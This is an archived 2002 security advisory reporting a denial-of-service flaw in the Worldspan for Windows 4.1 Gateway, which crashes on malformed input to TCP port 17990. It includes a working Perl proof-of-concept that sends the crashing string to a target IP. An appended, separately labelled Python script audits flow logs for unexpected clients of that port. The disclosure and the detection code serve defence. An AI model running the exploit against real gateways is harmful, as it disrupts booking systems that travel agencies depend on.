Worldspan DoS

From: altomo (altomoat_private)
Date: Thu Jul 04 2002 - 13:22:11 PDT


    Vendor: Worldspan (www.worldspan.com)
    Software: Worldspan for Windows 4.1 Gateway
    Problem: Invalid packets sent to gateway crash system
    Fix: No response from vendor.
    All systems should be firewalled from outsiders but there is no protection
    from insiders.
    
    
    Overview:
    
    Worldspan is one of the leading companies which creates software for use by
    travel agents.  Worldspan software is used by many travel agencies,
    airlines, and major travel websites.  This advisory focuses on Res Manager
    (Worldspan for Windows 4.1).  A user running Res Manager is connected to a
    gateway system at their local site which is then connected to Worldspan via
    private lines or the internet.  These gateway systems are the middle man
    between the agents and Worldspan.
    
    Blurb from website:
    "Worldspan provides global electronic distribution of travel information,
    Internet products and connectivity, and electronic commerce capabilities for
    travel agencies, travel service providers and corporations worldwide. The
    company's three lines of business are travel supplier services, e-commerce,
    and global distribution systems for the worldwide travel industry. The
    Worldspan reservations system provides nearly 21,000 travel agencies and
    other users worldwide with travel data and booking capabilities for hundreds
    of the world's leading travel supplier services. Worldspan is the market
    leader in e-commerce for the travel industry, processing more than 50
    percent of all online travel agency bookings. The company maintains world
    headquarters in Atlanta, Georgia. Worldspan is owned by affiliates of Delta
    Air Lines, Inc., (NYSE:DAL), Northwest Airlines (NASDAQ:NWAC) and American
    Airlines. Additional information is available at www.worldspan.com"
    
    
    Description of software from website:
    http://www.worldspan.com/home.asp?fPageID=53&fBUnit=9&fBUCatID=24&fProductID=57
    
    Problem:
    
    The Worldspan gateways are normally Windows 95 or 98 systems which run the
    gateway (gw) software, accept connections from the agents, then process
    these and send them to the Worldspan systems via private line or the
    internet.  The gw system uses TCP port 17990 to communicate with the agents.
    If a malformed packet is sent to this port the system will attempt to
    process it and eventually crash.  From the research thus far it seems the
    system uses all system resources trying to process this packet and then
    crashes.  In our lab the systems typically crash within 1 minute.
    
    Solution:
    
    These systems should be behind a firewall to be protected from outside
    attackers but due to the nature of the software there is no protection from
    internal users.  The vendor has been contacted 3 times over the last 4
    months but has not responded.  Checking with a large customer of Worldspan
    it seems they have not attempted to inform their clients of this issue.  We
    have spoken with our internal contacts at Worldspan and they had no
    information of this problem.  The vendor has ignored this issue, but that
    can no longer be done.
    
    Proof of Concept:
    -------------------------------
    #!/usr/bin/perl
    #altomoat_private
    #Worldspan Gateway DoS
    
    $sabre = "worldspanshouldgoboom";
    
    use IO::Socket;
    $ip = "$ARGV[0]";
    $port = "17990";
    if ($#ARGV<0) {
    print " usage: $0 <ip>\n";
    exit();
    }
    $socket = IO::Socket::INET->new(
    Proto=>"tcp",
    PeerAddr=>$ip,
    PeerPort=>$port,);
    
    
    print "Worldspan Gateway DoS\n";
    print "altomo\@digitalgangsters.net\n";
    
    print "Wait about a minute, and it should crash.\n";
    print $socket "$sabre\r";
    close $socket;
    
    #nudehackers
    -------------------------
    
    Q. Why write a DoS for some software no one has ever heard of?
    A. Learn the travel industry and this is bigger than it seems.
    
    --altomo
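
An added example, not part of the original advisory or any vendor code: a Python audit of flow records for the gateway port described above. It flags connections to TCP 17990 from sources outside the agent workstation networks and notes whether the gateway stopped answering shortly afterwards. The log format, the addresses, the `agent_nets` allowlist and the two-minute window are assumptions constructed for illustration.

```python
"""Audit flow records for unexpected clients of the gateway port (TCP 17990)."""
import ipaddress
from datetime import datetime, timedelta

GATEWAY_PORT = 17990                  # port named in the advisory
CRASH_WINDOW = timedelta(minutes=2)   # assumption: advisory reports crashes within ~1 minute

# Constructed sample records: time, source, destination, dest port, result
SAMPLE_FLOWS = """\
2002-07-04T09:00:05 10.1.1.21 10.1.1.5 17990 ESTABLISHED
2002-07-04T09:02:40 10.1.1.22 10.1.1.5 17990 ESTABLISHED
2002-07-04T09:14:10 10.1.7.80 10.1.1.5 17990 ESTABLISHED
2002-07-04T09:15:02 10.1.1.21 10.1.1.5 17990 NO_REPLY
2002-07-04T09:15:30 10.1.1.22 10.1.1.5 17990 NO_REPLY
2002-07-04T09:20:00 10.1.1.21 10.1.1.9 80 ESTABLISHED
"""

def parse_flows(text):
    """Parse whitespace-separated records, skipping lines with the wrong field count."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, port, state = parts
        flows.append((datetime.fromisoformat(ts), ipaddress.ip_address(src),
                      ipaddress.ip_address(dst), int(port), state))
    return sorted(flows, key=lambda f: f[0])

def audit(flows, agent_nets):
    """Report gateway-port connections from sources outside agent_nets."""
    nets = [ipaddress.ip_network(n) for n in agent_nets]
    gw_flows = [f for f in flows if f[3] == GATEWAY_PORT]
    findings = []
    for ts, src, dst, _, state in gw_flows:
        if state != "ESTABLISHED" or any(src in n for n in nets):
            continue
        # Did any client fail to reach the same gateway soon after this connection?
        outage = any(d == dst and s == "NO_REPLY" and ts < t <= ts + CRASH_WINDOW
                     for t, _, d, _, s in gw_flows)
        findings.append({"time": ts.isoformat(), "source": str(src),
                         "gateway": str(dst), "gateway_unresponsive_after": outage})
    return findings

if __name__ == "__main__":
    for finding in audit(parse_flows(SAMPLE_FLOWS), ["10.1.1.0/24"]):
        print(finding)
```

An allowlist only narrows the insider exposure the advisory describes; a connection from an allowed agent workstation would not be flagged.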
    



    This archive was generated by hypermail 2b30 : Thu Jul 04 2002 - 14:46:19 PDT